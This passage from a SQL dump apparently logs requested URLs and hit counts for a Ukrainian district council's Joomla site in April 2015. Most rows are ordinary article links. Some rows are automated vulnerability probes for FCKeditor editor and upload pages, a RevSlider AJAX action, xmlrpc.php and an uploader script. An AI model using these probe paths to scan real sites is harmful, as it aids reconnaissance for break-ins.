00:00:00',301),(12846,'http://www.malyn-rayrada.org.ua/index.php?option=com_comprofiler&task=registers','','','',4,0,'2015-04-12 04:09:08','0000-00-00 00:00:00',301),(12847,'http://www.malyn-rayrada.org.ua/index.php?option=com_joocm&view=register','','','',2,0,'2015-04-12 04:09:09','0000-00-00 00:00:00',301),(12848,'http://www.malyn-rayrada.org.ua/index.php?option=com_easysocial&view=registration','','','',2,0,'2015-04-12 04:09:10','0000-00-00 00:00:00',301),(12849,'http://www.malyn-rayrada.org.ua/registration','','','',2,0,'2015-04-12 04:09:10','0000-00-00 00:00:00',301),(12850,'http://www.malyn-rayrada.org.ua/index.php?option=com_easybookreloaded','','','',2,0,'2015-04-12 04:09:12','0000-00-00 00:00:00',301),(12851,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=311:-v-&catid=33&Itemid=66&lang=uk','','','',29,0,'2015-04-12 05:12:55','0000-00-00 00:00:00',301),(12852,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=313:-2011-2015-&catid=33&Itemid=66&lang=en','','','',16,0,'2015-04-13 02:57:46','0000-00-00 00:00:00',301),(12853,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1229:2014-02-28-09-49-28&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-04-13 04:08:09','0000-00-00 00:00:00',301),(12854,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=713:2012-06-14-15-13-57&catid=43&Itemid=82&lang=uk','','','',26,0,'2015-04-13 04:10:43','0000-00-00 00:00:00',301),(12855,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11&lang=en','','','',1,0,'2015-04-13 04:21:41','0000-00-00 00:00:00',301),(12856,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11&lang=ru','','','',1,0,'2015-04-13 04:21:54','0000-00-00 00:00:00',301),(12857,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11&lang=uk','','','',1,0,'2015-04-13 04:22:04','0000-00-00 00:00:00',301),(12858,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&catid=38&Itemid=73&lang=uk','','','',57,0,'2015-04-13 07:03:13','0000-00-00 00:00:00',301),(12859,'http://www.malyn-rayrada.org.ua/admin/panel/fckeditor/fckeditor.html','','','',1,0,'2015-04-13 15:25:48','0000-00-00 00:00:00',301),(12860,'http://www.malyn-rayrada.org.ua/site/mambots/editors/fckeditor/fckeditor.html','','','',1,0,'2015-04-13 15:25:52','0000-00-00 00:00:00',301),(12861,'http://www.malyn-rayrada.org.ua/fckeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:25:55','0000-00-00 00:00:00',301),(12862,'http://www.malyn-rayrada.org.ua/admin/templates/editor/fckeditor.html','','','',1,0,'2015-04-13 15:25:57','0000-00-00 00:00:00',301),(12863,'http://www.malyn-rayrada.org.ua/include/editor/fckeditor.html','','','',1,0,'2015-04-13 15:25:59','0000-00-00 00:00:00',301),(12864,'http://www.malyn-rayrada.org.ua/modules/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:02','0000-00-00 00:00:00',301),(12865,'http://www.malyn-rayrada.org.ua/admin/templates/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:08','0000-00-00 00:00:00',301),(12866,'http://www.malyn-rayrada.org.ua/webyep-system/programm/opt/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:10','0000-00-00 00:00:00',301),(12867,'http://www.malyn-rayrada.org.ua/outils/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:14','0000-00-00 00:00:00',301),(12868,'http://www.malyn-rayrada.org.ua/wspro/html/js/editor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:18','0000-00-00 00:00:00',301),(12869,'http://www.malyn-rayrada.org.ua/portal/html/js/editor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:20','0000-00-00 00:00:00',301),(12870,'http://www.malyn-rayrada.org.ua/gestion/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:24','0000-00-00 00:00:00',301),(12871,'http://www.malyn-rayrada.org.ua/site/modules/fckeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:27','0000-00-00 00:00:00',301),(12872,'http://www.malyn-rayrada.org.ua/public/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:31','0000-00-00 00:00:00',301),(12873,'http://www.malyn-rayrada.org.ua/V2/utils/WYSEditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:35','0000-00-00 00:00:00',301),(12874,'http://www.malyn-rayrada.org.ua/fhadmin/lib/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:38','0000-00-00 00:00:00',301),(12875,'http://www.malyn-rayrada.org.ua/admin/actualites4/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:42','0000-00-00 00:00:00',301),(12876,'http://www.malyn-rayrada.org.ua/resorce/admin/article/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:46','0000-00-00 00:00:00',301),(12877,'http://www.malyn-rayrada.org.ua/site/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:49','0000-00-00 00:00:00',301),(12878,'http://www.malyn-rayrada.org.ua/pebble/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:53','0000-00-00 00:00:00',301),(12879,'http://www.malyn-rayrada.org.ua/new2/admin/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:26:56','0000-00-00 00:00:00',301),(12880,'http://www.malyn-rayrada.org.ua/lists/admin/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:27:00','0000-00-00 00:00:00',301),(12881,'http://www.malyn-rayrada.org.ua/web-local/fak/rj/admin/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:27:03','0000-00-00 00:00:00',301),(12882,'http://www.malyn-rayrada.org.ua/novice/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:27:07','0000-00-00 00:00:00',301),(12883,'http://www.malyn-rayrada.org.ua/webmail/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:27:11','0000-00-00 00:00:00',301),(12884,'http://www.malyn-rayrada.org.ua/sites/all/libraries/fckeditor/fckeditor.html','','','',1,0,'2015-04-13 15:27:13','0000-00-00 00:00:00',301),(12885,'http://www.malyn-rayrada.org.ua/diendan/media/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:27:17','0000-00-00 00:00:00',301),(12886,'http://www.malyn-rayrada.org.ua/public_html/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:27:20','0000-00-00 00:00:00',301),(12887,'http://www.malyn-rayrada.org.ua/artsconnect/newsite/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:27:24','0000-00-00 00:00:00',301),(12888,'http://www.malyn-rayrada.org.ua/include/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:27:27','0000-00-00 00:00:00',301),(12889,'http://www.malyn-rayrada.org.ua/mailing/tools/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:27:30','0000-00-00 00:00:00',301),(12890,'http://www.malyn-rayrada.org.ua/library/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-13 15:27:33','0000-00-00 00:00:00',301),(12891,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-13 15:48:19','0000-00-00 00:00:00',301),(12892,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-13 15:48:36','0000-00-00 00:00:00',301),(12893,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-13 15:49:26','0000-00-00 00:00:00',301),(12894,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/42-informacija-dibrivskoi-silskoi-radi','','','',38,0,'2015-04-13 19:03:34','0000-00-00 00:00:00',301),(12895,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-13 21:49:49','0000-00-00 00:00:00',301),(12896,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-13 21:52:08','0000-00-00 00:00:00',301),(12897,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-13 21:53:13','0000-00-00 00:00:00',301),(12898,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-13 21:53:33','0000-00-00 00:00:00',301),(12899,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-13 21:53:35','0000-00-00 00:00:00',301),(12900,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-13 21:53:38','0000-00-00 00:00:00',301),(12901,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-13 21:54:03','0000-00-00 00:00:00',301),(12902,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-13 21:54:11','0000-00-00 00:00:00',301),(12903,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-13 21:54:14','0000-00-00 00:00:00',301),(12904,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-13 21:54:16','0000-00-00 00:00:00',301),(12905,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-13 21:54:19','0000-00-00 00:00:00',301),(12906,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-13 21:54:24','0000-00-00 00:00:00',301),(12907,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-13 21:54:27','0000-00-00 00:00:00',301),(12908,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-13 21:54:37','0000-00-00 00:00:00',301),(12909,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=ru&Itemid=','','','',1,0,'2015-04-13 21:54:49','0000-00-00 00:00:00',301),(12910,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=uk&Itemid=','','','',1,0,'2015-04-13 21:54:52','0000-00-00 00:00:00',301),(12911,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-13 21:55:06','0000-00-00 00:00:00',301),(12912,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-13 21:55:40','0000-00-00 00:00:00',301),(12913,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-13 21:55:43','0000-00-00 00:00:00',301),(12914,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-13 21:55:45','0000-00-00 00:00:00',301),(12915,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-13 21:55:47','0000-00-00 00:00:00',301),(12916,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-13 21:55:50','0000-00-00 00:00:00',301),(12917,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=en&Itemid=','','','',1,0,'2015-04-13 21:55:53','0000-00-00 00:00:00',301),(12918,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-13 21:55:55','0000-00-00 00:00:00',301),(12919,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-13 21:55:57','0000-00-00 00:00:00',301),(12920,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=uk&Itemid=','','','',1,0,'2015-04-13 21:56:07','0000-00-00 00:00:00',301),(12921,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=uk','','','',6,0,'2015-04-14 02:38:27','0000-00-00 00:00:00',301),(12922,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=ru&Itemid=','','','',3,0,'2015-04-14 02:39:25','0000-00-00 00:00:00',301),(12923,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=uk&Itemid=','','','',4,0,'2015-04-14 02:42:26','0000-00-00 00:00:00',301),(12924,'http://malyn-rayrada.org.ua/index.php/480-pro-sklikannja-19-pozachergovoi-sesii-rajonnoi','','','',5,0,'2015-04-14 05:15:31','0000-00-00 00:00:00',301),(12925,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=276:---4-----6--25032011-&catid=31:-25032011&Itemid=62&lang=en','','','',13,0,'2015-04-14 05:32:55','0000-00-00 00:00:00',301),(12926,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=276:---4-----6--25032011-&catid=31:-25032011&Itemid=62&lang=ru','','','',1,0,'2015-04-14 05:32:57','0000-00-00 00:00:00',301),(12927,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=ru','','','',9,0,'2015-04-14 05:32:59','0000-00-00 00:00:00',301),(12928,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2015-04-14 05:36:26','0000-00-00 00:00:00',301),(12929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11&lang=uk','','','',37,0,'2015-04-14 06:53:26','0000-00-00 00:00:00',301),(12930,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=38:--19122011-&Itemid=73&lang=uk','','','',13,0,'2015-04-14 08:30:33','0000-00-00 00:00:00',301),(12931,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=en&Itemid=0','','','',1,0,'2015-04-14 09:18:21','0000-00-00 00:00:00',301),(12932,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-04-14 09:18:24','0000-00-00 00:00:00',301),(12933,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-04-14 09:18:30','0000-00-00 00:00:00',301),(12934,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29:--15122010-&Itemid=60&lang=en','','','',29,0,'2015-04-14 11:44:56','0000-00-00 00:00:00',301),(12935,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=en&Itemid=0','','','',1,0,'2015-04-14 12:19:41','0000-00-00 00:00:00',301),(12936,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-04-14 12:20:03','0000-00-00 00:00:00',301),(12937,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-04-14 12:20:06','0000-00-00 00:00:00',301),(12938,'http://www.malyn-rayrada.org.ua/wp-admin/admin-ajax.php?action=revslider_ajax_action','','','',153,0,'2015-04-14 14:06:12','0000-00-00 00:00:00',301),(12939,'http://malyn-rayrada.org.ua/admin/editors/fckeditor/editor/filemanager/upload/test.html','','','',1,0,'2015-04-14 15:11:29','0000-00-00 00:00:00',301),(12940,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=en','','','',1,0,'2015-04-14 17:20:14','0000-00-00 00:00:00',301),(12941,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-04-14 17:21:57','0000-00-00 00:00:00',301),(12942,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=851:-2013-&catid=46&Itemid=85&lang=en','','','',1,0,'2015-04-14 17:22:53','0000-00-00 00:00:00',301),(12943,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=en&Itemid=0','','','',1,0,'2015-04-14 17:22:58','0000-00-00 00:00:00',301),(12944,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&catid=20:2010-06-07-09-15-05&Itemid=42&lang=en','','','',6,0,'2015-04-14 17:37:27','0000-00-00 00:00:00',301),(12945,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&catid=20:2010-06-07-09-15-05&Itemid=42&lang=ru','','','',4,0,'2015-04-14 17:37:30','0000-00-00 00:00:00',301),(12946,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29:--15122010-&Itemid=60&lang=ru','','','',15,0,'2015-04-14 17:39:17','0000-00-00 00:00:00',301),(12947,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38:--19122011-&Itemid=73&lang=en','','','',7,0,'2015-04-14 17:41:13','0000-00-00 00:00:00',301),(12948,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38:--19122011-&Itemid=73&lang=ru','','','',12,0,'2015-04-14 17:41:46','0000-00-00 00:00:00',301),(12949,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=738:-c-&catid=43:--25072012-&Itemid=82&lang=ru','','','',16,0,'2015-04-14 17:46:21','0000-00-00 00:00:00',301),(12950,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-04-14 17:46:47','0000-00-00 00:00:00',301),(12951,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:--------------------2012-&catid=36&Itemid=70&lang=uk','','','',17,0,'2015-04-14 17:54:43','0000-00-00 00:00:00',301),(12952,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38&Itemid=73&lang=uk','','','',3,0,'2015-04-14 18:00:37','0000-00-00 00:00:00',301),(12953,'http://malyn-rayrada.org.ua/xmlrpc.php','','','',2,0,'2015-04-14 21:07:29','0000-00-00 00:00:00',301),(12954,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=38&Itemid=73&lang=uk','','','',28,0,'2015-04-15 01:09:33','0000-00-00 00:00:00',301),(12955,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=200:-----------------2006-2010-&catid=29&Itemid=60&lang=en','','','',1,0,'2015-04-15 04:59:53','0000-00-00 00:00:00',301),(12956,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=200:-----------------2006-2010-&catid=29&Itemid=60&lang=ru','','','',1,0,'2015-04-15 04:59:59','0000-00-00 00:00:00',301),(12957,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29&Itemid=60&lang=en','','','',1,0,'2015-04-15 05:02:32','0000-00-00 00:00:00',301),(12958,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29&Itemid=60&lang=ru','','','',4,0,'2015-04-15 05:02:39','0000-00-00 00:00:00',301),(12959,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=312:-2011-&catid=33&Itemid=66&lang=en','','','',1,0,'2015-04-15 05:44:19','0000-00-00 00:00:00',301),(12960,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&catid=33&Itemid=66&lang=en','','','',1,0,'2015-04-15 05:45:00','0000-00-00 00:00:00',301),(12961,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=326:2011-05-20-16-17-28&catid=33&Itemid=66&lang=en','','','',1,0,'2015-04-15 05:45:03','0000-00-00 00:00:00',301),(12962,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&catid=38&Itemid=73&lang=en','','','',1,0,'2015-04-15 05:46:35','0000-00-00 00:00:00',301),(12963,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&catid=38&Itemid=73&lang=ru','','','',1,0,'2015-04-15 05:46:38','0000-00-00 00:00:00',301),(12964,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=313:-2011-2015-&catid=33&Itemid=66&lang=uk','','','',8,0,'2015-04-15 07:31:52','0000-00-00 00:00:00',301),(12965,'http://malyn-rayrada.org.ua/index.php/800-prokuratura-malinskogo-rajonu-informue','','','',4,0,'2015-04-15 11:55:33','0000-00-00 00:00:00',301),(12966,'http://malyn-rayrada.org.ua/index.php/498-vidbulas-18-sesija-rajonnoi-radi','','','',4,0,'2015-04-15 11:55:34','0000-00-00 00:00:00',301),(12967,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=311:-v-&catid=33:-20052011&Itemid=66&lang=ru','','','',1,0,'2015-04-15 13:06:16','0000-00-00 00:00:00',301),(12968,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=312:-2011-&catid=33:-20052011&Itemid=66&lang=uk','','','',1,0,'2015-04-15 13:06:18','0000-00-00 00:00:00',301),(12969,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=313:-2011-2015-&catid=33&Itemid=66&lang=ru','','','',1,0,'2015-04-15 13:06:24','0000-00-00 00:00:00',301),(12970,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=313:-2011-2015-&catid=33:-20052011&Itemid=66&lang=uk','','','',1,0,'2015-04-15 13:06:30','0000-00-00 00:00:00',301),(12971,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&catid=33:-20052011&Itemid=66&lang=en','','','',1,0,'2015-04-15 13:07:33','0000-00-00 00:00:00',301),(12972,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&catid=33:-20052011&Itemid=66&lang=ru','','','',1,0,'2015-04-15 13:07:37','0000-00-00 00:00:00',301),(12973,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&catid=33:-20052011&Itemid=66&lang=uk','','','',8,0,'2015-04-15 13:07:44','0000-00-00 00:00:00',301),(12974,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=326:2011-05-20-16-17-28&catid=33&Itemid=66&lang=ru','','','',34,0,'2015-04-15 13:08:20','0000-00-00 00:00:00',301),(12975,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=326:2011-05-20-16-17-28&catid=33&Itemid=66&lang=uk','','','',3,0,'2015-04-15 13:08:23','0000-00-00 00:00:00',301),(12976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=327:2011-05-20-16-20-26&catid=33&Itemid=66&lang=ru','','','',1,0,'2015-04-15 13:08:26','0000-00-00 00:00:00',301),(12977,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=327:2011-05-20-16-20-26&catid=33&Itemid=66&lang=uk','','','',13,0,'2015-04-15 13:08:29','0000-00-00 00:00:00',301),(12978,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=327:2011-05-20-16-20-26&catid=33:-20052011&Itemid=66&lang=ru','','','',1,0,'2015-04-15 13:08:32','0000-00-00 00:00:00',301),(12979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=327:2011-05-20-16-20-26&catid=33:-20052011&Itemid=66&lang=uk','','','',3,0,'2015-04-15 13:08:34','0000-00-00 00:00:00',301),(12980,'http://malyn-rayrada.org.ua/index.php/763-nachalnik-mrv-kvi-ivan-levchenko-informue','','','',5,0,'2015-04-15 13:46:40','0000-00-00 00:00:00',301),(12981,'http://malyn-rayrada.org.ua/includes/uploader.php','','http://malyn-rayrada.org.ua/includes/uploader.php','',1,0,'2015-04-15 13:51:58','0000-00-00 00:00:00',301),(12982,'http://malyn-rayrada.org.ua/blog/xmlrpc.php','','','',1,0,'2015-04-15 16:14:16','0000-00-00 00:00:00',301),(12983,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=465:-l-r-2011-&catid=38&Itemid=73&lang=en','','','',1,0,'2015-04-15 16:54:18','0000-00-00 00:00:00',301),(12984,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=465:-l-r-2011-&catid=38&Itemid=73&lang=ru','','','',1,0,'2015-04-15 16:54:23','0000-00-00 00:00:00',301),(12985,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=38&Itemid=73&lang=en','','','',1,0,'2015-04-15 16:54:51','0000-00-00 00:00:00',301),(12986,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=38&Itemid=73&lang=ru','','','',3,0,'2015-04-15 16:54:57','0000-00-00 00:00:00',301),(12987,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38&Itemid=73&lang=en','','','',1,0,'2015-04-15 16:56:04','0000-00-00 00:00:00',301),(12988,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38&Itemid=73&lang=ru','','','',1,0,'2015-04-15 16:56:07','0000-00-00 00:00:00',301),(12989,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-04-15 17:06:58','0000-00-00 00:00:00',301),(12990,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-04-15 17:07:01','0000-00-00 00:00:00',301),(12991,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=ru&Itemid=0','','','',2,0,'2015-04-15 17:07:07','0000-00-00 00:00:00',301),(12992,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-04-15 17:07:11','0000-00-00 00:00:00',301),(12993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29&Itemid=60&lang=uk','','','',38,0,'2015-04-15 17:12:35','0000-00-00 00:00:00',301),(12994,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29:--15122010-&Itemid=60&lang=uk','','','',16,0,'2015-04-15 17:12:40','0000-00-00 00:00:00',301),(12995,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=311:-v-&catid=33:-20052011&Itemid=66&lang=uk','','','',1,0,'2015-04-15 17:13:21','0000-00-00 00:00:00',301),(12996,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=312:-2011-&catid=33&Itemid=66&lang=uk','','','',41,0,'2015-04-15 17:13:30','0000-00-00 00:00:00',301),(12997,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=438:-----------l--r&catid=37:--21102011-&Itemid=72&lang=uk','','','',1,0,'2015-04-15 17:15:16','0000-00-00 00:00:00',301),(12998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38:--19122011-&Itemid=73&lang=en','','','',1,0,'2015-04-15 